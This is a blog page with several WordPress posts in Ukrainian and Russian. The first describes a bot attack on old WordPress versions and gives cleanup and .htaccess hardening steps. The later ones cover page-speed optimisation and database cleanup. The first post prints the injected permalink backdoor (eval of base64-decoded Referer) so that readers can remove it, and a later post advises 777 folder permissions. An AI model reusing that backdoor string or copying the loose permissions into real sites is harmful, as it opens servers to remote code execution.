Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:

• В налаштуваннях ЧПУ, поміняти з
  /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  на
  /%postname%/
  (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
• Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
• Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

• зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
• створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:

  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.98.173
  

  а якщо у вас динамічна айпішка, то краще напишіть так:

  
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.0.0/255.255.0.0
  

  Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

• Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

[tab:По русски]

Вчера прошла волна атаки и взлома блогов на вордпрессе. И если погуглить, то можно судить, что пострадали тысячи блогов.

Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии WordPress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.

И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: корисні функції в functions.php — советую и вам так же сделать ;)

А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:

• В настройках ЧПУ, поменять с
  /%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  на
  /%postname%/
  (у вас может отличаться структура, по аналогии думаю поймете, что где поменять :))
• Найдите последнего зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: bugbeemershonyhe@gmail.com
• Обновите WordPress до версии 2.8.4

А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.
Для это сделайте следующее:

• зайдите на сайт myip.ru чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173
• создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:

  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.98.173
  

  в случае динамического IP-адреса, напишите так:

  
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.0.0/255.255.0.0
  

  Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте здесь.

• Сохраните файл. Все.

Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и временно переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «Это я еще должен и пароль на фтп помнить для таких случаев?» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»

Берегите себя и берегите свой блог.

[tab:END]

Давненько я нічого нового не публікував, все займаюсь іншими речами: роблю свою першу тему для вордпресу, вивчаю css та jquery, взявся за сайт присвячего доктору Хаусу, найняв туди контент-менеджера, тепер всі прибутки з того сайту йдуть їй на зарплату, але впевнений, що це швидко окупиться.

А ще давно я собі намітив в todo’шках, аби оптимізувати код сторінок сайту, бо вони занадто багато займають. Загалом проблема великого розміру коду сторінок властива всім вордпресовським блогам, на які поначіплювано багато плагінів, чи використовують преміум-теми. Колись провіряв по сервісу webo.in свій блог, так він знайшов багато слабких місць і дав довжелезний список рекомендацій, як покращити код сайту і зробити його швидшим та легшим для завантаження.
Коли я то все почав вручну робити, то вже на перших пунктах затикався, бо не знав як додавати ETag / Last-Modified для файлів, зменшувати кількість css та javascript’ів теж непросто, бо не знаєш, чи надовго в тебе той чи інший плагін, який їх використовує. Короче, я забив на то всьо і зрозумів, що ще не доріс до такої оптимізації.

І тут, буквально позавчора натикаюсь на один скрипт, що оптимізує сайти якраз по цим параметрам. А як я втішився, коли побачив, що для wordpress’у вони випустили плагін, що робить всю ручну оптимізацію автоматичною, по натисканню однієї кнопки. Ляпота!

Загалом суть цього плагіну така: він об’єднує всі css-файли в один, всі js скрипти теж в один файл, потім його стискає gzip’ом, додає ETag / Last-Modified для усіх файлів, мініфікує сторінки (minify), додає кешуючі заголовки до всіх файлів, а в наступних версіях навіть обіцяють автоматом збирати CSS-спрайти (CSS Sprites).

І все що треба, так це скачати плагін PHP Speedy, активувати, та перейти на сторінку його налаштувань, де за допомогою підказок ви дізнаєтесь, що треба зробити. На правильних хостингах (яким я вважаю TOPUA.net) нічого не треба змінювати, а ось на більшості прийдеться змінити права доступу на файл конфігу плагіну, та дати права 777 на папку cache цього плагіну, в якій і будуть зберігатись наші оптимізовані css та js файли.

Я коли провірив, то очам своїм не міг повірити. Ось характеристика моєї головної сторінки блогу до оптимізації (дані взяті з плагіну Yslow):

А ось після того, як я натиснув кнопочку ‘Activate’ в плагіні PHP Speedy:

Вражає, правда? (тут А це найвища оцінка а F це найгірша, така американська система оцінок)

І маленька ложечка дьогтю: все кльово, але плагін ще не є релізом і тому трапляютсья деякі недоліки, ось наприклад він не може аналізувати css що включені через @import, але обіцяють і це виправити в наступних версіях.

Пробуйте і ви. Провірити можна на око, а можна отримати і точні дані завдяки аддонам Firebug (вкладка NET) та Yslow.

В моєму випадку з бази я викинув 67% сміття, у вас я думаю показники будуть більші. Отож по порядку:

1. Clean Options – чистим опції
2. Знищуємо таблиці від непотрібних плагінів
3. Міняємо кодування бази даних Вордпресу
4. Вилучаємо ревізії постів
5. Викидаєм зайве з Dashboard

А почалося все з цього:

Зверніть увагу на таблицю wp_options – 1.3Mb – це ж нечуванно!

Clean Options – чистим опції
Саме прикріше те, що “сміттєва” інформація знаходиться в таблиці wp_options (мабудь розраховували на те, що звичайний юзер побоїться в неї залізти). Отож скачуємо плагін Clean Options і запускаємо його кнопкою Find Orphaned Options. Ви побачите довжелезний список опцій що були добавленні плагінами, що стоять у вас, або колись стояли. От видалити ті опції плагінів що уже не стоять задача нелегка, адже там явно не вказано від якого плагіну той чи інший запис, тому прийдеться діяти наосліп озброївшись пошуком по гуглю. (можливо все таки варто зробити бекап бази перед цими діями, я відповідальності за ваші дії не несу). А нижче ви побачите список новин з rss-каналів що появляються в Панелі керування.

Ну признайтесь, хтось з вас їх читав? Я ні, а саме ці новини і займають по пару мегабайт в ваших базах даних вордпресу. От від них ми і безболісно позбавимось. Виділяєте їх і тиснете на “View Selected Options Information” де ви побачите зміст цих полів. Перед вами простягнеться довжелезне простирадло з довжелезним скроллом зі змістом того “сміття”. Одразу ж після завершення завантаження сторінки жміть End на клавіатурі, вибирайте галочку “Yes, Remove ALL of these options from the wp_options table.” і Submit. Здавалося би все — діло зроблене, але насправді ці дані все ще лишились в базі і для того щоб їх остаточно знищити слід зробити оптимізацію таблиць. Для цього заходимо в PhpMyAdmin і вибираємо таблицю wp_options а внизу вибираєм пунктик “Optimize Table”

Знищуємо таблиці від непотрібних плагінів

Як швидко дізнатись, що таблиця не “рідна-вордпресовська” а від плагіну?
По замовчуванню вордпрес створює 10 таблиць:
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_terms
wp_term_relationships
wp_term_taxonomy
wp_usermeta
wp_users
Думаю у вас кількість таблиць значно більша і вияснити яка з них іще використовується, а яка вже ні, справа дещо складніша. Я лише так “на око” по назвам прикидував, здебільшого в назвах міститься натяк на те до якого плагіна вона відноситься. Ті таблиці що мені були невідомі я просто назву їх закидував в гугль і дивився результат. Таким чином з бази я викинув 21-у таблицю із 35!

Виправлення помилки в кодуваннях таблиць бази даних WordPress

В мене виявилось що по налаштуваннях MySql на хостингу всі нові таблиці створювались в кодуванні latin1_swedish_ci що є зовсім неправильним, але легко виправляється. Для цього в PhpMyAdmin в закладці Operations(Операции) знаходимо рядок: Collantions (Сравнение) і міняємо його на utf8_general_ci. Go! ok.
А от як бути з тими що вже в неправильному кодуванні? В інтернеті є описаний спосіб як його поміняти, але мені було простіше видалити всі таблиці в неправильному кодуванні і заново активувати плагіни що їх створювали (але в цьому я був впевнений, а вам так діяти не рекомендую, краще залишіть як є).

Видаляємо ревізії постів
В новій версії вордпресу ввели таке поняття як ревізії. Оскільки більшості ця функція нафіг не впала, то її можна вимкнути тим самим ще зменшити розмір бази даних і не давати їй так швидко розростатись. Для цього в файлі wp-config.php вимикаємо ревізії:

define('WP_POST_REVISIONS', false);

а потім все в тому ж PhpMyAdmin (Ви ж іще не закрили вкладку із ним, чи не так ;)) робимо запит:

DELETE FROM wp_posts WHERE post_type = 'revision'; 

Опісля виділяємо таблицю wp_posts і робимо її оптимізацію (надіюсь ще пам’ятаєте, пару абзаців вище я писав як ще робиться)

Викидуєм зайве з Dashboard (панель керування)
Ну і нарешті заліземо в один файлик — wp-admin/index.php з якого викинемо зайві рядки, аби нові rss-новини більше не засмічували базу.

<div id="dashboard-widgets-wrap">

<?php wp_dashboard(); ?>

</div>

От той рядок що закресленний якраз і треба викинути. Незручність лише в тому, що при кожному оновленні версії WordPress прийдеться знову чистити базу від RSS-каналів новин та знову видаляти цей рядочок у файлі.
В результаті цих дій я отримав таку картину:

і я нею задоволений, з 3-ох мегабайт зменшити базу до 1 метра!
p.s. До речі, плагін Clean Options після всіх цих дій, можна вимкнути, а коли обновитесь до нової версії WordPress то знову ввімкнете і повторите ці дії.